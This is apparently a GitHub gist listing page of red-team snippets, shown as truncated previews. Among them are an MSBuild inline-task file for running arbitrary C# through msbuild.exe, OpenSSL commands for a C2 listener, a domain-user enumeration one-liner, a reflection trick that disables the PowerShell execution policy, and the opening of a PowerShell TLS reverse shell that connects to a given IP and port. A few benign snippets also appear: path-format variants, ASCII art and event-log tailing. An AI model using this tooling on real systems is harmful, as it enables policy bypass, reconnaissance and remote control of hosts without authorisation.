Skip to content

Instantly share code, notes, and snippets.

View clr2of8's full-sized avatar

Carrie Roberts clr2of8

286 followers · 0 following
View GitHub Profile
@clr2of8
clr2of8 / pshell.xml
Created June 11, 2019 19:57
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
@clr2of8
clr2of8 / c2_openssl_server.txt
Created February 22, 2019 17:50
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 9876
@clr2of8
clr2of8 / parse-net-users.bat
Last active October 14, 2023 09:28
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
@clr2of8
clr2of8 / bypassPowershellExecutionPolicy.ps1
Created October 24, 2020 22:03
bypass powershell execution policy
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
Disable-ExecutionPolicy
@clr2of8
clr2of8 / openssl-c2.ps1
Created January 3, 2020 01:39
function openssl-c2 ($ip,$port,$domain="fake.domain") {
$socket = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient($domain, $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
@clr2of8
clr2of8 / DOS FilePath Magic Tricks.txt
Last active October 2, 2023 09:43
# Fully Qualified DOS Paths (begins with a drive letter, a volume separator, and a component separator)
c:\Windows\System32\notepad.exe
# UNC Paths (begins with two separators w/o a question mark or period following)
\\127.0.0.1\c$\Windows\System32\notepad.exe
\\LOCALHOST\c$\Windows\System32\notepad.exe
\\::1\c$\Windows\System32\notepad.exe
\\0:0:0::1\c$\Windows\System32\notepad.exe
\\127.0.0.1\admin$\System32\notepad.exe
\\DESKTOP-MH8DLT1\admin$\System32\notepad.exe
@clr2of8
clr2of8 / asciiart2.ps1
Created June 12, 2023 21:57
$art = @"
__________ _________.__ .__ .__ _____ .___ _____ _________
\______ \______ _ __ ___________/ _____/| |__ ____ | | | | _/ ____\___________ | | _____/ ____\____ / _____/ ____ ____
| ___/ _ \ \/ \/ // __ \_ __ \_____ \ | | \_/ __ \| | | | \ __\/ _ \_ __ \ | |/ \ __\/ _ \\_____ \_/ __ \_/ ___\
| | ( <_> ) /\ ___/| | \/ \| Y \ ___/| |_| |__ | | ( <_> ) | \/ | | | \ | ( <_> ) \ ___/\ \___
|____| \____/ \/\_/ \___ >__| /_______ /|___| /\___ >____/____/ |__| \____/|__| |___|___| /__| \____/_______ /\___ >\___ >
\/ \/ \/ \/ \/ \/ \/ \/
"@
Write-Host -Fore Cyan $art
@clr2of8
clr2of8 / Watch-EventLogTail.ps1
Created September 11, 2022 01:45 — forked from LeeHolmes/Watch-EventLogTail.ps1
Tail an event log through PowerShell
## PowerShell Eventing lets you tail an event log:
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
Register-ObjectEvent $watcher EventRecordWritten -Action {
$event = $eventArgs.EventRecord
if($event.ProcessId -ne $pid)
{
## Save the last event into a variable in the PowerShell sesssion if you want to explore its properties,
## as the eventing actions run in their own runspace
# $GLOBAL:lastEvent = $event
@clr2of8
clr2of8 / asciiart.ps1
Created December 16, 2022 21:18
$art = @"
,ggg, ,ggggggggggg, ,ggggggggggggggg
dP""8I I8 dP"""88""""""Y8, 8I dP""""""88"""""""
dP 88 I8 Yb, 88 `8b 8I Yb,_ 88
dP 88 88888888 gg `" 88 ,8P 8I `"" 88
,8' 88 I8 "" 88aaaad8P" 8I 88
d88888888 I8 ,ggggg, ,ggg,,ggg,,ggg, gg ,gggg, 88""""Yb, ,ggg, ,gggg,8I 88 ,ggg, ,gggg,gg ,ggg,,ggg,,ggg,
__ ,8" 88 I8 dP" "Y8ggg,8" "
@clr2of8
clr2of8 / WinEventTail.bat
Created September 30, 2022 23:17
@echo off
SETLOCAL EnableDelayedExpansion
FOR /L %%L IN (0,0,1) DO @(
REM get UTC times modified from: https://stackoverflow.com/questions/9871499/how-to-get-utc-time-with-windows-batch-file
for /f %%a in ('wmic Path Win32_UTCTime get Year^,Month^,Day^,Hour^,Minute^,Second /Format:List ^| findstr "="') do (
set %%a
)
Set Second=0!Second:~0,-1!
Set Second=!Second:~-2!